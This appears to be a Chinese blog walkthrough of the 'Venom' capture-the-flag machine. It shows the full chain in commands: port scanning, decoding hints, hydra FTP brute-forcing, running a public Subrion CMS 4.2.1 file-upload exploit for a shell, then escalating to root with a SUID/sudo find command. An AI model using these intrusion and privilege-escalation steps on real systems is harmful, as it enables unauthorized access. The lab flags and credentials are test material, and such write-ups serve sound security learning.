Venom靶机渗透记录

最新推荐文章于 2024-10-01 18:22:37 发布
althumi
最新推荐文章于 2024-10-01 18:22:37 发布
阅读量376
点赞数 7
文章标签：网络安全 php ctf python 内网渗透
本文链接：https://blog.csdn.net/althumi/article/details/135097633
版权
nmap -sP 

主机：10.80.56.101
靶机：10.80.56.170

#扫描一下端口详细信息，好多端口都是关闭的，这样也好，思路范围小一点
nmap -A -n 1-65535 10.80.56.170

PORT     STATE  SERVICE    VERSION
21/tcp   open   ftp        vsftpd 3.0.3
22/tcp   closed ssh
80/tcp   open   http       Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
443/tcp  open   http       Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
7070/tcp closed realserver
8084/tcp closed websnp
MAC Address: 08:00:27:10:E2:AE (Oracle VirtualBox virtual NIC)

#没有什么可用的信息
nmap -sS -sV -A -n 10.80.56.170

#扫描网站目录
dirsearch -u https://10.80.56.170/
#主页注释发现疑似MD5加密，尝试在线网站解密，成功获取类似用户名的字符串
  <!--
    Modified from the Debian original for Ubuntu
    Last updated: 2016-11-16
    See: https://launchpad.net/bugs/1288690
  -->

<!...<5f2a66f947fa5690c26506f66bde5c23> follow this to get access on somewhere.....-->
hostinger
#尝试ftp，发现需要密码
ftp 10.80.56.170
#尝试爆破，爆破了很久，切换思路
hydra -l hostinger -P /usr/share/wordlists/rockyou.txt 10.80.56.170 ftp
#感觉密码可能也是这个，然后尝试，成功
ftp用户：hostinger 密码：hostinger
#获取提示
get hint.txt
cat hint.txt                      
        Hey there... 

T0D0 --
#第一句话有两个编码后的字符
* You need to follow the 'hostinger' on WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0= also aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=
* some knowledge of cipher is required to decode the dora password..
* try on venom.box
password -- L7f9l8@J#p%Ue+Q1234 -> deocode this you will get the administrator password 
 
#使用Cyber厨子魔法解密，https://cryptii.com/pipes/vigenere-cipher
aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=
#使用Cyber厨子魔法解密，standard vigenere cipher
WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0=
#获取信息，需要到解密的网站上使用standard vigenere cipher，并且密钥为hostinger，解密。
* You need to follow the 'hostinger' on standard vigenere cipher also https://cryptii.com/pipes/vigenere-cipher 
* some knowledge of cipher is required to decode the dora password..
#修改hosts添加域名解析venom.box
* try on venom.box
Have fun .. :)
#获取信息
用户：dora
密码：E7r9t8@Q#h%Hy+M1234
#尝试进入网页，登录成功，获取管理员后台
venom.box
#文件根目录
/var/www/html/subrion 
#扫描框架，发现可用漏洞
searchsploit Subrion CMS 4.2.1 
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                            |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Subrion CMS 4.2.1 - 'avatar[path]' XSS                                                                                                                                                                    | php/webapps/49346.txt
Subrion CMS 4.2.1 - Arbitrary File Upload                                                                                                                                                                 | php/webapps/49876.py
Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)                                                                                                                                          | php/webapps/50737.txt
Subrion CMS 4.2.1 - Cross-Site Scripting                                                                                                                                                                  | php/webapps/45150.txt
Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS)    
#获取文件上传脚本
searchsploit -m 49876.py
#上传成功，获取shell
python 49876.py -u http://venom.box/panel -l dora -p E7r9t8@Q#h%Hy+M1234
#无法切换交互式shell，但是知道网站文件上传可用phar文件访问，上传反弹shell脚本，切换交互式成功
python -c "import pty;pty.spawn('/bin/bash')"
#获得hostinger密码
cat .backup.txt
User_access

user: hostinger
password: hostinger
#找到一个flag
cat robots.txt
User-agent: *
F1nd_Y0ur_way_t0_g3t1n.txt
#在backups目录下找到密码，尝试已知加密算法，未能解密，可能就是明文
cat .htaccess
allow from all
You_will_be_happy_now :)
FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a
#切换用户
su hostinger
#查看.bash_history文件，发现check_me.py文件很疑惑，发现经常切换nathan用户
find raj -exec "whoami" \;
cat check_me.py
#切换用户，使用上面的密码
su nathan
#获得第2个flag
cat user.txt
W3_@r3_V3n0m:P
#发现用户具有root执行权限
-rw-r--r--  1 nathan nathan    0 May 20  2021 .sudo_as_admin_successful
#尝试直接sudo su，失败
sudo -l
[sudo] password for nathan: FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a

Matching Defaults entries for nathan on venom:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nathan may run the following commands on venom:
    (root) ALL, !/bin/su
    (root) ALL, !/bin/su

sudo su
#又发现check_me.py
chmod +s check_me.py 
ls -al
python check_me.py 
nano check_me.py 
python check_me.py 
chmod 740 check_me.py 
#该用户具有find权限，查询信息，以及check_me.py，未找到
find / -name 'F1nd_Y0ur_way_t0_g3t1n.txt'
#查询4000权限文件，发现find
find / -user root -perm -4000 -print 2>/dev/null
/opt/VBoxGuestAdditions-6.1.20/bin/VBoxDRMClient
/usr/bin/find
#使用find提权，成功
sudo find . -exec /bin/sh \; -quit

#获得最后一个flag，通关
cat root.txt
#root_flag
H@v3_a_n1c3_l1fe.